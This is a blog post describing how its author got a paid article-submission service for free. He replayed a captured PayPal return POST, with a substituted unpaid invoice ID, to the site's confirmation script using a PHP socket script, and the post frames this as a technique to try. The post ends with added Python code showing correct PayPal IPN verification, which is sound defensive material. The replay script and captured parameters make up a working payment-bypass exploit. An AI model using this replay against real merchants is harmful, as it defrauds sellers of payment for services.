Re-use paid service

Published on July 27th, 2008

Programmers are lazy. Especially when it comes to protecting their program. Yesterday I came across a nice example of laziness.

Let's say you buy an online service somewhere through PayPal, for example a site which will submit your article to hundreds of other websites, but you have to pay each time you submit a new article.

How can you bypass this? Well, first you'll have to pay for one article just to see how the system works and how it verifies purchases. So what I did was enter my article in the form, pay with PayPal and watch my article being published on all the other websites.

In the background I had been logging all headers and responses with Live HTTP Headers. After I submitted the form, I was redirected to a file called paypal.php, which saves the article and redirects to PayPal. In the POST redirect to PayPal the owner of the site naturally sends along an ID for the saved article, so that once I have paid it knows which article is mine.

So I paid and was redirected to a page confirming my payment (/cgi-bin/paid.pl), with the following POST parameters sent from PayPal to the confirmation page:

txn_type=web_accept&payment_date=11%3A09%3A21+Jul+26%2C+2008+PDT&last_name=John&residence_country=US&item_name=Whatever&payment_gross=10.00&mc_currency=USD&business=&payment_type=instant&payer_status=verified&verify_sign=KiPd9Bdvkeyf7FQfdbScxo4dgo3pxccAEgZO5zWesa23-6fdf-cfsRndvPLzSvxc6Jds903dfDF&payer_email=&tax=0.00&txn_id=&first_name=&receiver_email=&quantity=1&payer_id=&invoice=[INVOICE ID]receiver_id=&item_number=&payment_status=Completed&mc_fee=1.17&payment_fee=1.17&shipping=0.00&mc_gross=10&custom=&charset=&notify_version=2.4&merchant_return_link=Click+Here+to+Continue

So naturally, I captured this and tried the following:

    <?php
    // Open a raw TCP connection to the target's web server.
    $fp = fsockopen("www.target.com", 80, $errno, $errstr, 30);
    if (!$fp) {
        echo "$errstr ($errno)<br />\n";
    } else {
        // The body captured from PayPal's redirect, replayed unchanged
        // (only the invoice ID is substituted).
        $postdata = 'txn_type=web_accept&payment_date=11%3A09%3A21+Jul+26%2C+2008+PDT&last_name=John&residence_country=US&item_name=Whatever&payment_gross=10.00&mc_currency=USD&business=&payment_type=instant&payer_status=verified&verify_sign=KiPd9Bdvkeyf7FQfdbScxo4dgo3pxccAEgZO5zWesa23-6fdf-cfsRndvPLzSvxc6Jds903dfDF&payer_email=&tax=0.00&txn_id=&first_name=&receiver_email=&quantity=1&payer_id=&invoice=[INVOICE ID]&receiver_id=&item_number=&payment_status=Completed&mc_fee=1.17&payment_fee=1.17&shipping=0.00&mc_gross=10&custom=&charset=&notify_version=2.4&merchant_return_link=Click+Here+to+Continue';
        // Hand-built HTTP/1.1 POST to the confirmation script.
        $salida  = "POST /cgi-bin/paid.pl HTTP/1.1\r\n";
        $salida .= "Host: www.target.com\r\n";
        $salida .= "Content-Type: application/x-www-form-urlencoded\r\n";
        $salida .= "Content-Length: " . strlen($postdata) . "\r\n";
        $salida .= "Connection: close\r\n\r\n";
        $salida .= $postdata;
        fwrite($fp, $salida);
        // Print whatever paid.pl answers.
        while (!feof($fp)) {
            $d = fgets($fp);
            echo $d;
        }
        fclose($fp);
    }

paid.pl gladly accepted this and started distributing my article.

After that I entered another article in the form and got redirected to PayPal. I did not pay, but instead captured the invoice ID and substituted it into the postdata in the code above.

The mistake paid.pl made was not using the PayPal API to verify that the payment had in fact been completed. Instead, it simply looked at one of the parameters, presumably payment_status, and assumed the payment was completed.

So modifying parameters and then sending them to a payment verification system may sometimes work, if the programmer was too lazy to use the PayPal API.

Of course you could use Firefox's Tamper Data as well to do this kind of thing.
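For contrast, here is what a confirmation handler like paid.pl should have done before distributing the article. This is an added example written for this page, not the blog's code nor the target site's; it is in Python rather than Perl or PHP because the checks are language-neutral. It goes a little beyond the single mistake described above: besides asking PayPal whether it really sent the message (the IPN post-back with cmd=_notify-validate to https://ipnpb.paypal.com/cgi-bin/webscr, which answers VERIFIED or INVALID), it also checks the receiver, the amount, the invoice and the transaction ID against replay. The names merchant_email, orders and seen_txn_ids, the sample bodies and the injectable post_back callable are assumptions of the example so that it runs offline.

```python
# Added example (not the blog's or the target site's code): the verification a
# return/IPN handler such as paid.pl should perform before releasing a paid
# service, beside the naive check the post describes.  merchant_email, orders,
# seen_txn_ids and the sample bodies are assumptions of this example.
# PayPal's real validation endpoint is https://ipnpb.paypal.com/cgi-bin/webscr
# (the message is echoed back with cmd=_notify-validate and PayPal answers
# VERIFIED or INVALID); post_back is injectable so the example runs offline.
from urllib.parse import parse_qs
from urllib.request import Request, urlopen

PAYPAL_VALIDATE_URL = "https://ipnpb.paypal.com/cgi-bin/webscr"


def paypal_post_back(raw_body: str) -> str:
    """Echo the untouched body back to PayPal; returns 'VERIFIED' or 'INVALID'."""
    req = Request(PAYPAL_VALIDATE_URL,
                  data=("cmd=_notify-validate&" + raw_body).encode(),
                  headers={"Content-Type": "application/x-www-form-urlencoded"})
    with urlopen(req, timeout=30) as resp:
        return resp.read().decode().strip()


def parse_fields(raw_body: str) -> dict:
    """Flatten the urlencoded body to a dict, keeping empty values."""
    return {k: v[0] for k, v in parse_qs(raw_body, keep_blank_values=True).items()}


def naive_is_paid(raw_body: str) -> bool:
    """What the post says paid.pl effectively did: trust payment_status."""
    return parse_fields(raw_body).get("payment_status") == "Completed"


def verify_ipn(raw_body, *, merchant_email, orders, seen_txn_ids,
               post_back=paypal_post_back):
    """Return (ok, reason).  orders maps invoice -> {"price", "currency", "paid"};
    seen_txn_ids is the set of transaction ids already honoured."""
    f = parse_fields(raw_body)
    if post_back(raw_body) != "VERIFIED":          # PayPal did not send this
        return False, "post-back not VERIFIED"
    if f.get("payment_status") != "Completed":      # pending, refunded, ...
        return False, "payment_status not Completed"
    if f.get("receiver_email", "").lower() != merchant_email.lower():
        return False, "receiver_email mismatch"     # paid to someone else
    order = orders.get(f.get("invoice", ""))
    if order is None:
        return False, "unknown invoice"
    if order["paid"]:
        return False, "invoice already paid"
    try:
        gross = float(f.get("mc_gross", ""))
    except ValueError:
        return False, "bad mc_gross"
    if gross != order["price"] or f.get("mc_currency") != order["currency"]:
        return False, "amount/currency mismatch"    # 0.01 USD for a 10 USD job
    txn_id = f.get("txn_id", "")
    if not txn_id:
        return False, "missing txn_id"
    if txn_id in seen_txn_ids:
        return False, "duplicate txn_id"            # replayed message
    seen_txn_ids.add(txn_id)
    order["paid"] = True
    return True, "ok"


# Constructed sample data (not captured from any real site).
MERCHANT = "seller@example.com"
# Mirrors the post's forged body: payment_status=Completed, but receiver_email
# and txn_id are empty because no payment ever happened.
FORGED_BODY = ("payment_status=Completed&receiver_email=&txn_id=&invoice=INV-1001"
               "&mc_gross=10&mc_currency=USD&payer_status=verified")
GENUINE_BODY = ("payment_status=Completed&receiver_email=seller%40example.com"
                "&txn_id=TXN-CONSTRUCTED-1&invoice=INV-1001"
                "&mc_gross=10.00&mc_currency=USD")


def make_orders():
    """Pending orders the site created before redirecting to PayPal."""
    return {"INV-1001": {"price": 10.0, "currency": "USD", "paid": False}}


if __name__ == "__main__":
    verified = lambda body: "VERIFIED"   # offline stand-in for PayPal
    print("naive check on forged body:", naive_is_paid(FORGED_BODY))
    print("strict check on forged body:",
          verify_ipn(FORGED_BODY, merchant_email=MERCHANT, orders=make_orders(),
                     seen_txn_ids=set(), post_back=lambda body: "INVALID"))
    orders, seen = make_orders(), set()
    print("genuine:", verify_ipn(GENUINE_BODY, merchant_email=MERCHANT,
                                 orders=orders, seen_txn_ids=seen, post_back=verified))
    print("replay:", verify_ipn(GENUINE_BODY, merchant_email=MERCHANT,
                                orders=orders, seen_txn_ids=seen, post_back=verified))
```

The post-back is the check that defeats the trick in the post: PayPal will answer INVALID for a body it never generated. The remaining checks matter even when the message is genuine, since a real payment to a different account, for a smaller amount, or one replayed against a second invoice would otherwise still pass.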

